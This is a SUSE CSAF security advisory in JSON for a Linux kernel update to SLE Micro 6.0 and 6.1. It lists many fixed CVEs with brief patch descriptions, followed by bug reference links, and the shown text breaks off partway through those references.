|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for the Linux Kernel",
"title": "Title of the patch"
},
{
"category": "description",
"text": "\nThe SUSE Linux Enterprise Micro 6.0 and Micro 6.1 kernel was updated to fix various security issues\n\nThe following security issues were fixed:\n\n- CVE-2023-54013: interconnect: Fix locking for runpm vs reclaim (bsc#1256280).\n- CVE-2025-38321: smb: Log an error when close_all_cached_dirs fails (bsc#1246328).\n- CVE-2025-38728: smb3: fix for slab out of bounds on mount to ksmbd (bsc#1249256).\n- CVE-2025-39880: libceph: fix invalid accesses to ceph_connection_v1_info (bsc#1250388).\n- CVE-2025-39890: wifi: ath12k: fix memory leak in ath12k_service_ready_ext_event (bsc#1250334).\n- CVE-2025-39977: futex: Prevent use-after-free during requeue-PI (bsc#1252046).\n- CVE-2025-40006: mm/hugetlb: fix folio is still mapped when deleted (bsc#1252342).\n- CVE-2025-40024: vhost: Take a reference on the task in struct vhost_task (bsc#1252686).\n- CVE-2025-40033: remoteproc: pru: Fix potential NULL pointer dereference in pru_rproc_set_ctable() (bsc#1252824).\n- CVE-2025-40042: tracing: Fix race condition in kprobe initialization causing NULL pointer dereference (bsc#1252861).\n- CVE-2025-40053: net: dlink: handle copy_thresh allocation failure (bsc#1252808).\n- CVE-2025-40081: perf: arm_spe: Prevent overflow in PERF_IDX2OFF() (bsc#1252776).\n- CVE-2025-40102: KVM: arm64: Prevent access to vCPU events before init (bsc#1252919).\n- CVE-2025-40123: bpf: Enforce expected_attach_type for tailcall compatibility (bsc#1253365).\n- CVE-2025-40134: dm: fix NULL pointer dereference in __dm_suspend() (bsc#1253386).\n- CVE-2025-40135: ipv6: use RCU in ip6_xmit() (bsc#1253342).\n- CVE-2025-40153: mm: hugetlb: avoid soft lockup when mprotect to large memory area (bsc#1253408).\n- CVE-2025-40158: ipv6: use RCU in ip6_output() (bsc#1253402).\n- CVE-2025-40160: xen/events: Cleanup find_virq() return codes (bsc#1253400).\n- CVE-2025-40167: ext4: detect invalid INLINE_DATA + EXTENTS flag combination (bsc#1253458).\n- CVE-2025-40170: net: use dst_dev_rcu() in sk_setup_caps() (bsc#1253413).\n- CVE-2025-40178: pid: Add a judgment for ns null in pid_nr_ns (bsc#1253463).\n- CVE-2025-40179: ext4: verify orphan file size is not too big (bsc#1253442).\n- CVE-2025-40187: net/sctp: fix a null dereference in sctp_disposition sctp_sf_do_5_1D_ce() (bsc#1253647).\n- CVE-2025-40190: ext4: guard against EA inode refcount underflow in xattr update (bsc#1253623).\n- CVE-2025-40215: kABI: xfrm: delete x-\u003etunnel as we delete x (bsc#1254959).\n- CVE-2025-40220: fuse: fix livelock in synchronous file put from fuseblk workers (bsc#1254520).\n- CVE-2025-40231: vsock: fix lock inversion in vsock_assign_transport() (bsc#1254815).\n- CVE-2025-40233: ocfs2: clear extent cache after moving/defragmenting extents (bsc#1254813).\n- CVE-2025-40238: net/mlx5: Fix IPsec cleanup over MPV device (bsc#1254871).\n- CVE-2025-40240: sctp: avoid NULL dereference when chunk data buffer is missing (bsc#1254869).\n- CVE-2025-40242: gfs2: Fix unlikely race in gdlm_put_lock (bsc#1255075).\n- CVE-2025-40248: vsock: Ignore signal/timeout on connect() if already established (bsc#1254864).\n- CVE-2025-40250: net/mlx5: Clean up only new IRQ glue on request_irq() failure (bsc#1254854).\n- CVE-2025-40251: devlink: rate: Unset parent pointer in devl_rate_nodes_destroy (bsc#1254856).\n- CVE-2025-40252: net: qlogic/qede: fix potential out-of-bounds read in qede_tpa_cont() and qede_tpa_end() (bsc#1254849).\n- CVE-2025-40254: net: openvswitch: remove never-working support for setting nsh fields (bsc#1254852).\n- CVE-2025-40257: mptcp: fix a race in mptcp_pm_del_add_timer() (bsc#1254842).\n- CVE-2025-40258: mptcp: fix race condition in mptcp_schedule_work() (bsc#1254843).\n- CVE-2025-40259: scsi: sg: Do not sleep in atomic context (bsc#1254845).\n- CVE-2025-40261: nvme: nvme-fc: Ensure -\u003eioerr_work is cancelled in nvme_fc_delete_ctrl() (bsc#1254839).\n- CVE-2025-40264: be2net: pass wrb_params in case of OS2BMC (bsc#1254835).\n- CVE-2025-40268: cifs: client: fix memory leak in smb3_fs_context_parse_param (bsc#1255082).\n- CVE-2025-40271: fs/proc: fix uaf in proc_readdir_de() (bsc#1255297).\n- CVE-2025-40274: KVM: guest_memfd: Remove bindings on memslot deletion when gmem is dying (bsc#1254830).\n- CVE-2025-40278: net: sched: act_ife: initialize struct tc_ife to fix KMSAN kernel-infoleak (bsc#1254825).\n- CVE-2025-40279: net: sched: act_connmark: initialize struct tc_ife to fix kernel leak (bsc#1254846).\n- CVE-2025-40280: tipc: Fix use-after-free in tipc_mon_reinit_self() (bsc#1254847).\n- CVE-2025-40287: exfat: fix improper check of dentry.stream.valid_size (bsc#1255030).\n- CVE-2025-40289: drm/amdgpu: hide VRAM sysfs attributes on GPUs without VRAM (bsc#1255042).\n- CVE-2025-40292: virtio-net: fix received length check in big packets (bsc#1255175).\n- CVE-2025-40293: iommufd: Don\u0027t overflow during division for dirty tracking (bsc#1255179).\n- CVE-2025-40297: net: bridge: fix use-after-free due to MST port state bypass (bsc#1255187).\n- CVE-2025-40307: exfat: validate cluster allocation bits of the allocation bitmap (bsc#1255039).\n- CVE-2025-40319: bpf: Sync pending IRQ work before freeing ring buffer (bsc#1254794).\n- CVE-2025-40328: smb: client: fix potential UAF in smb2_close_cached_fid() (bsc#1254624).\n- CVE-2025-40331: sctp: Prevent TOCTOU out-of-bounds write (bsc#1254615).\n- CVE-2025-40337: net: stmmac: Correctly handle Rx checksum offload errors (bsc#1255081).\n- CVE-2025-40338: ASoC: Intel: avs: Do not share the name pointer between components (bsc#1255273).\n- CVE-2025-40339: drm/amdgpu: fix nullptr err of vm_handle_moved (bsc#1255428).\n- CVE-2025-40346: arch_topology: Fix incorrect error check in topology_parse_cpu_capacity() (bsc#1255318).\n- CVE-2025-40350: net/mlx5e: RX, Fix generating skb from non-linear xdp_buff for striding RQ (bsc#1255260).\n- CVE-2025-40355: sysfs: check visibility before changing group attribute ownership (bsc#1255261).\n- CVE-2025-40360: drm/sysfb: Do not dereference NULL pointer in plane reset (bsc#1255095).\n- CVE-2025-40363: net: ipv6: fix field-spanning memcpy warning in AH output (bsc#1255102).\n- CVE-2025-68171: x86/fpu: Ensure XFD state on signal delivery (bsc#1255255).\n- CVE-2025-68174: amd/amdkfd: enhance kfd process check in switch partition (bsc#1255327).\n- CVE-2025-68178: blk-cgroup: fix possible deadlock while configuring policy (bsc#1255266).\n- CVE-2025-68188: tcp: use dst_dev_rcu() in tcp_fastopen_active_disable_ofo_check() (bsc#1255269).\n- CVE-2025-68190: drm/amdgpu/atom: Check kcalloc() for WS buffer in amdgpu_atom_execute_table_locked() (bsc#1255131).\n- CVE-2025-68200: bpf: Add bpf_prog_run_data_pointers() (bsc#1255241).\n- CVE-2025-68201: drm/amdgpu: remove two invalid BUG_ON()s (bsc#1255136).\n- CVE-2025-68204: pmdomain: arm: scmi: Fix genpd leak on provider registration failure (bsc#1255224).\n- CVE-2025-68206: netfilter: nft_ct: add seqadj extension for natted connections (bsc#1255142).\n- CVE-2025-68208: bpf: account for current allocated stack depth in widen_imprecise_scalars() (bsc#1255227).\n- CVE-2025-68209: mlx5: Fix default values in create CQ (bsc#1255230).\n- CVE-2025-68227: mptcp: Fix proto fallback detection with BPF (bsc#1255216).\n- CVE-2025-68230: drm/amdgpu: fix gpu page fault after hibernation on PF passthrough (bsc#1255134).\n- CVE-2025-68239: binfmt_misc: restore write access before closing files opened by open_exec() (bsc#1255272).\n- CVE-2025-68241: ipv4: route: Prevent rt_bind_exception() from rebinding stale fnhe (bsc#1255157).\n- CVE-2025-68245: net: netpoll: fix incorrect refcount handling causing incorrect cleanup (bsc#1255268).\n- CVE-2025-68255: staging: rtl8723bs: fix stack buffer overflow in OnAssocReq IE parsing (bsc#1255395).\n- CVE-2025-68259: KVM: SVM: Don\u0027t skip unrelated instruction if INT3/INTO is replaced (bsc#1255199).\n- CVE-2025-68261: ext4: add i_data_sem protection in ext4_destroy_inline_data_nolock() (bsc#1255164).\n- CVE-2025-68264: ext4: refresh inline data size before write operations (bsc#1255380).\n- CVE-2025-68284: libceph: prevent potential out-of-bounds writes in handle_auth_session_key() (bsc#1255377).\n- CVE-2025-68285: libceph: fix potential use-after-free in have_mon_and_osd_map() (bsc#1255401).\n- CVE-2025-68296: drm, fbcon, vga_switcheroo: Avoid race condition in fbcon setup (bsc#1255128).\n- CVE-2025-68297: ceph: fix crash in process_v2_sparse_read() for encrypted directories (bsc#1255403).\n- CVE-2025-68301: net: atlantic: fix fragment overflow handling in RX path (bsc#1255120).\n- CVE-2025-68320: lan966x: Fix sleeping in atomic context (bsc#1255172).\n- CVE-2025-68325: net/sched: sch_cake: Fix incorrect qlen reduction in cake_drop (bsc#1255417).\n- CVE-2025-68327: usb: renesas_usbhs: Fix synchronous external abort on unbind (bsc#1255488).\n- CVE-2025-68337: jbd2: avoid bug_on in jbd2_journal_get_create_access() when file system corrupted (bsc#1255482).\n- CVE-2025-68340: team: Move team device type change at the end of team_port_add (bsc#1255507).\n- CVE-2025-68349: NFSv4/pNFS: Clear NFS_INO_LAYOUTCOMMIT in pnfs_mark_layout_stateid_invalid (bsc#1255544).\n- CVE-2025-68363: bpf: Check skb-\u003etransport_header is set in bpf_skb_check_mtu (bsc#1255552).\n- CVE-2025-68365: fs/ntfs3: Initialize allocated memory before use (bsc#1255548).\n- CVE-2025-68366: nbd: defer config unlock in nbd_genl_connect (bsc#1255622).\n- CVE-2025-68367: macintosh/mac_hid: fix race condition in mac_hid_toggle_emumouse (bsc#1255547).\n- CVE-2025-68372: nbd: defer config put in recv_work (bsc#1255537).\n- CVE-2025-68378: bpf: Refactor stack map trace depth calculation into helper function (bsc#1255614).\n- CVE-2025-68379: RDMA/rxe: Fix null deref on srq-\u003erq.queue after resize failure (bsc#1255695).\n- CVE-2025-68727: ntfs3: Fix uninit buffer allocated by __getname() (bsc#1255568).\n- CVE-2025-68728: ntfs3: fix uninit memory after failed mi_read in mi_format_new (bsc#1255539).\n- CVE-2025-68733: smack: fix bug: unprivileged task can create labels (bsc#1255615).\n- CVE-2025-68742: bpf: Improve program stats run-time calculation (bsc#1255707).\n- CVE-2025-68744: bpf: Free special fields when update [lru_,]percpu_hash maps (bsc#1255709).\n- CVE-2025-68764: NFS: Automounted filesystems should inherit ro,noexec,nodev,sync flags (bsc#1255930).\n- CVE-2025-68768: inet: frags: add inet_frag_queue_flush() (bsc#1256579).\n- CVE-2025-68770: bnxt_en: Fix XDP_TX path (bsc#1256584).\n- CVE-2025-68771: ocfs2: fix kernel BUG in ocfs2_find_victim_chain (bsc#1256582).\n- CVE-2025-68775: net/handshake: duplicate handshake cancellations leak socket (bsc#1256665).\n- CVE-2025-68776: net/hsr: fix NULL pointer dereference in prp_get_untagged_frame() (bsc#1256659).\n- CVE-2025-68788: fsnotify: do not generate ACCESS/MODIFY events on child for special files (bsc#1256638).\n- CVE-2025-68795: ethtool: Avoid overflowing userspace buffer on stats query (bsc#1256688).\n- CVE-2025-68798: perf/x86/amd: Check event before enable to avoid GPF (bsc#1256689).\n- CVE-2025-68800: mlxsw: spectrum_mr: Fix use-after-free when updating multicast route stats (bsc#1256646).\n- CVE-2025-68801: mlxsw: spectrum_router: Fix neighbour use-after-free (bsc#1256653).\n- CVE-2025-68803: nfsd: set security label during create operations (bsc#1256770).\n- CVE-2025-68813: ipvs: fix ipv4 null-ptr-deref in route error path (bsc#1256641).\n- CVE-2025-68814: io_uring: fix filename leak in __io_openat_prep() (bsc#1256651).\n- CVE-2025-68815: net/sched: ets: Remove drr class from the active list if it changes to strict (bsc#1256680).\n- CVE-2025-68816: net/mlx5: fw_tracer, Validate format string parameters (bsc#1256674).\n- CVE-2025-68820: ext4: xattr: fix null pointer deref in ext4_raw_inode() (bsc#1256754).\n- CVE-2025-71064: net: hns3: using the num_tqps in the vf driver to apply for resources (bsc#1256654).\n- CVE-2025-71066: net/sched: ets: Always remove class from active list before deleting in ets_qdisc_change (bsc#1256645).\n- CVE-2025-71077: tpm: Cap the number of PCR banks (bsc#1256613).\n- CVE-2025-71084: RDMA/cm: Fix leaking the multicast GID table reference (bsc#1256622).\n- CVE-2025-71085: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (bsc#1256623).\n- CVE-2025-71087: iavf: fix off-by-one issues in iavf_config_rss_reg() (bsc#1256628).\n- CVE-2025-71088: mptcp: fallback earlier on simult connection (bsc#1256630).\n- CVE-2025-71089: iommu: disable SVA when CONFIG_X86 is set (bsc#1256612).\n- CVE-2025-71091: team: fix check for port enabled in team_queue_override_port_prio_changed() (bsc#1256773).\n- CVE-2025-71093: e1000: fix OOB in e1000_tbi_should_accept() (bsc#1256777).\n- CVE-2025-71094: net: usb: asix: ax88772: Increase phy_name size (bsc#1256597).\n- CVE-2025-71095: net: stmmac: fix the crash issue for zero copy XDP_TX action (bsc#1256605).\n- CVE-2025-71096: RDMA/core: Check for the presence of LS_NLA_TYPE_DGID correctly (bsc#1256606).\n- CVE-2025-71097: ipv4: Fix reference count leak when using error routes with nexthop objects (bsc#1256607).\n- CVE-2025-71098: ip6_gre: make ip6gre_header() robust (bsc#1256591).\n- CVE-2025-71112: net: hns3: add VLAN id validation before using (bsc#1256726).\n- CVE-2025-71116: libceph: make decode_pool() more resilient against corrupted osdmaps (bsc#1256744).\n- CVE-2025-71120: SUNRPC: svcauth_gss: avoid NULL deref on zero length gss_token in gss_read_proxy_verf (bsc#1256779).\n- CVE-2025-71123: ext4: fix string copying in parse_apply_sb_mount_options() (bsc#1256757).\n- CVE-2025-71133: RDMA/irdma: avoid invalid read in irdma_net_event (bsc#1256733).\n- CVE-2025-71135: md/raid5: fix possible null-pointer dereferences in raid5_store_group_thread_cnt() (bsc#1256761).\n- CVE-2025-71137: octeontx2-pf: fix \"UBSAN: shift-out-of-bounds error\" (bsc#1256760).\n- CVE-2025-71149: io_uring/poll: correctly handle io_poll_add() return value on update (bsc#1257164).\n- CVE-2026-22976: net/sched: sch_qfq: Fix NULL deref when deactivating inactive aggregate in qfq_reset (bsc#1257035).\n- CVE-2026-22977: net: sock: fix hardened usercopy panic in sock_recv_errqueue (bsc#1257053).\n- CVE-2026-22984: libceph: prevent potential out-of-bounds reads in handle_auth_done() (bsc#1257217).\n- CVE-2026-22990: libceph: replace overzealous BUG_ON in osdmap_apply_incremental() (bsc#1257221).\n- CVE-2026-22991: libceph: make free_choose_arg_map() resilient to partial allocation (bsc#1257220).\n- CVE-2026-22992: libceph: return the handler error from mon_handle_auth_done() (bsc#1257218).\n- CVE-2026-22993: idpf: Fix RSS LUT NULL pointer crash on early ethtool operations (bsc#1257180).\n- CVE-2026-22996: net/mlx5e: Don\u0027t store mlx5e_priv in mlx5e_dev devlink priv.\n- CVE-2026-22999: net/sched: sch_qfq: do not free existing class in qfq_change_class() (bsc#1257236).\n- CVE-2026-23000: net/mlx5e: Fix crash on profile change rollback failure (bsc#1257234).\n- CVE-2026-23001: macvlan: fix possible UAF in macvlan_forward_source() (bsc#1257232).\n- CVE-2026-23005: x86/fpu: Clear XSTATE_BV in guest XSAVE state whenever XFD[i]=1 (bsc#1257245).\n- CVE-2026-23010: ipv6: Fix use-after-free in inet6_addr_del() (bsc#1257332).\n- CVE-2026-23011: ipv4: ip_gre: make ipgre_header() robust (bsc#1257207).\n\nThe following non security issues were fixed:\n\n- ALSA: usb-audio: Update for native DSD support quirks (stable-fixes).\n- Disable CONFIG_CPU5_WDT The cpu5wdt driver doesn\u0027t implement a\n proper watchdog interface and has many code issues. It only handles\n obscure and obsolete hardware. Stop building and supporting this driver\n (jsc#PED-14062).\n- Update config files (jsc#PED-12554 jsc#PED-6996\n bsc#1243677 ltc#213602 bsc#1243678 ltc#213596)\n CONFIG_IMA_KEYRINGS_PERMIT_SIGNED_BY_BUILTIN_OR_SECONDARY=y\n CONFIG_INTEGRITY_CA_MACHINE_KEYRING_MAX=y\n- Update config files: disable CONFIG_DEVPORT for arm64 (bsc#1256792)\n- bpf/selftests: test_select_reuseport_kern: Remove unused header (bsc#1257603).\n- bpf: Do not let BPF test infra emit invalid GSO types to stack (bsc#1255569).\n- cifs: Fix copy offload to flush destination region (bsc#1252511).\n- cifs: Fix flushing, invalidation and file size with copy_file_range() (bsc#1252511).\n- cifs: Fix uncached read into ITER_KVEC iterator (bsc#1245449).\n- cifs: make cifs_chan_update_iface() a void function (git-fixes).\n- cifs: update dstaddr whenever channel iface is updated (git-fixes).\n- cpuidle: menu: Use residency threshold in polling state override decisions (bsc#1255026).\n- dm: fix queue start/stop imbalance under suspend/load/resume races (bsc#1253386)\n- drm/amdgpu: update mappings not managed by KFD (bsc#1255428)\n- ext4: use optimized mballoc scanning regardless of inode format (bsc#1254378).\n- ext4: wait for ongoing I/O to complete before freeing blocks (bsc#1256366).\n- fs: dlm: allow to F_SETLKW getting interrupted (bsc#1255025).\n- ice: use netif_get_num_default_rss_queues() (bsc#1247712).\n- media: atomisp: Prefix firmware paths with \"intel/ipu/\" (bsc#1252973).\n- media: atomisp: Remove firmware_name module parameter (bsc#1252973).\n- mm, page_alloc, thp: prevent reclaim for __GFP_THISNODE THP allocations (bsc#1254447 bsc#1253087).\n- net: hv_netvsc: reject RSS hash key programming without RX indirection table (bsc#1257473).\n- net: tcp: allow zero-window ACK update the window (bsc#1254767).\n- net: usb: pegasus: fix memory leak in update_eth_regs_async() (git-fixes).\n- powerpc/addnote: Fix overflow on 32-bit builds (bsc#1215199).\n- powerpc/eeh: fix recursive pci_lock_rescan_remove locking in EEH event\n handling (bsc#1253262 ltc#216029).\n- powerpc/kexec: Enable SMT before waking offline CPUs (bsc#1214285\n bsc#1205462 ltc#200161 ltc#200588 git-fixes bsc#1253739 ltc#211493\n bsc#1254244 ltc#216496).\n- sched: Increase sched_tick_remote timeout (bsc#1254510).\n- scsi: lpfc: Add capability to register Platform Name ID to fabric (bsc#1254119).\n- scsi: lpfc: Allow support for BB credit recovery in point-to-point topology (bsc#1254119).\n- scsi: lpfc: Ensure unregistration of rpis for received PLOGIs (bsc#1254119).\n- scsi: lpfc: Fix leaked ndlp krefs when in point-to-point topology (bsc#1254119).\n- scsi: lpfc: Fix reusing an ndlp that is marked NLP_DROPPED during FLOGI (bsc#1254119).\n- scsi: lpfc: Modify kref handling for Fabric Controller ndlps (bsc#1254119).\n- scsi: lpfc: Remove redundant NULL ptr assignment in lpfc_els_free_iocb() (bsc#1254119).\n- scsi: lpfc: Revise discovery related function headers and comments (bsc#1254119).\n- scsi: lpfc: Rework lpfc_sli4_fcf_rr_next_index_get() (bsc#1256861).\n- scsi: lpfc: Update lpfc version to 14.4.0.12 (bsc#1254119).\n- scsi: lpfc: Update lpfc version to 14.4.0.13 (bsc#1256861).\n- scsi: lpfc: Update various NPIV diagnostic log messaging (bsc#1254119).\n- scsi: qla2xxx: Add Speed in SFP print information (bsc#1256863).\n- scsi: qla2xxx: Add bsg interface to support firmware img validation (bsc#1256863).\n- scsi: qla2xxx: Add load flash firmware mailbox support for 28xxx (bsc#1256863).\n- scsi: qla2xxx: Add support for 64G SFP speed (bsc#1256863).\n- scsi: qla2xxx: Allow recovery for tape devices (bsc#1256863).\n- scsi: qla2xxx: Delay module unload while fabric scan in progress (bsc#1256863).\n- scsi: qla2xxx: Fix bsg_done() causing double free (bsc#1256863).\n- scsi: qla2xxx: Free sp in error path to fix system crash (bsc#1256863).\n- scsi: qla2xxx: Query FW again before proceeding with login (bsc#1256863).\n- scsi: qla2xxx: Update version to 10.02.10.100-k (bsc#1256863).\n- scsi: qla2xxx: Validate MCU signature before executing MBC 03h (bsc#1256863).\n- scsi: qla2xxx: Validate sp before freeing associated memory (bsc#1256863).\n- scsi: storvsc: Process unsupported MODE_SENSE_10 (bsc#1257296).\n- smb: client: split cached_fid bitfields to avoid shared-byte RMW races (bsc#1250748,bsc#1257154).\n- smb: client: update cfid-\u003elast_access_time in open_cached_dir_by_dentry() (git-fixes).\n- smb: improve directory cache reuse for readdir operations (bsc#1252712).\n- soc/tegra: fuse: speedo-tegra210: Update speedo IDs (git-fixes).\n- spi: tegra210-quad: Check hardware status on timeout (bsc#1253155)\n- spi: tegra210-quad: Fix timeout handling (bsc#1253155)\n- spi: tegra210-quad: Refactor error handling into helper functions (bsc#1253155)\n- spi: tegra210-quad: Update dummy sequence configuration (git-fixes)\n- supported.conf: Mark lan 743x supported (jsc#PED-14571)\n- tracing: Fix access to trace_event_file (bsc#1254373).\n- wifi: mwifiex: Fix a loop in mwifiex_update_ampdu_rxwinsize() (git-fixes).\n- x86/microcode/AMD: Add TSA microcode SHAs (bsc#1256528).\n- x86/microcode/AMD: Add Zen5 model 0x44, stepping 0x1 minrev (bsc#1256528).\n- x86/microcode/AMD: Add more known models to entry sign checking (bsc#1256528).\n- x86/microcode/AMD: Add some forgotten models to the SHA check (bsc#1256528).\n- x86/microcode/AMD: Clean the cache if update did not load microcode (bsc#1256528).\n- x86/microcode/AMD: Extend the SHA check to Zen5, block loading of any\n unreleased standalone Zen5 microcode patches (bsc#1256528).\n- x86/microcode/AMD: Fix Entrysign revision check for Zen5/Strix Halo (bsc#1256528).\n- x86/microcode/AMD: Fix __apply_microcode_amd()\u0027s return value (bsc#1256528).\n- x86/microcode/AMD: Limit Entrysign signature checking to known generations (bsc#1256528).\n- x86/microcode/AMD: Load only SHA256-checksummed patches (bsc#1256528).\n- x86/microcode/AMD: Select which microcode patch to load (bsc#1256528).\n- x86/microcode/AMD: Use sha256() instead of init/update/final (bsc#1256528).\n- x86/microcode: Fix Entrysign revision check for Zen1/Naples (bsc#1256528).\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-SLE-Micro-6.1-kernel-281",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2026_20498-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2026:20498-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620498-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2026:20498-1",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-February/024476.html"
},
{
"category": "self",
"summary": "SUSE Bug 1012628",
"url": "https://bugzilla.suse.com/1012628"
},
{
"category": "self",
"summary": "SUSE Bug 1065729",
"url": "https://bugzilla.suse.com/1065729"
},
{
"category": "self",
"summary": "SUSE Bug 1194869",
"url": "https://bugzilla.suse.com/1194869"
},
{
"category": "self",
"summary": "SUSE Bug 1205462",
"url": "https://bugzilla.suse.com/1205462"
},
{
"category": "self",
"summary": "SUSE Bug 1214285",
"url": "https://bugzilla.suse.com/1214285"
},
{
"category": "self",
"summary": "SUSE Bug 1214635",
"url": "https://bugzilla.suse.com/1214635"
},
{
"category": "self",
"summary": "SUSE Bug 1214847",
"url": "https://bugzilla.suse.com/1214847"
},
{
"category": "self",
"summary": "SUSE Bug 1215146",
"url": "https://bugzilla.suse.com/1215146"
},
{
"category": "self",
"summary": "SUSE Bug 1215199",
"url": "https://bugzilla.suse.com/1215199"
},
{
"category": "self",
"summary": "SUSE Bug 1215211",
"url": "https://bugzilla.suse.com/1215211"
},
{
"category": "self",
"summary": "SUSE Bug 1215344",
"url": "https://bugzilla.suse.com/1215344"
},
{
"category": "self",
"summary": "SUSE Bug 1216062",
"url": "https://bugzilla.suse.com/1216062"
},
{
"category": "self",
"summary": "SUSE Bug 1216436",
"url": "https://bugzilla.suse.com/1216436"
},
{
"category": "self",
"summary": "SUSE Bug 1219165",
"url": "https://bugzilla.suse.com/1219165"
},
{
"category": "self",
"summary": "SUSE Bug 1220419",
"url": "https://bugzilla.suse.com/1220419"
},
{
"category": "self",
"summary": "SUSE Bug 1223731",
"url": "https://bugzilla.suse.com/1223731"
},
{
"category": "self",
"summary": "SUSE Bug 1223800",
"url": "https://bugzilla.suse.com/1223800"
},
{
"category": "self",
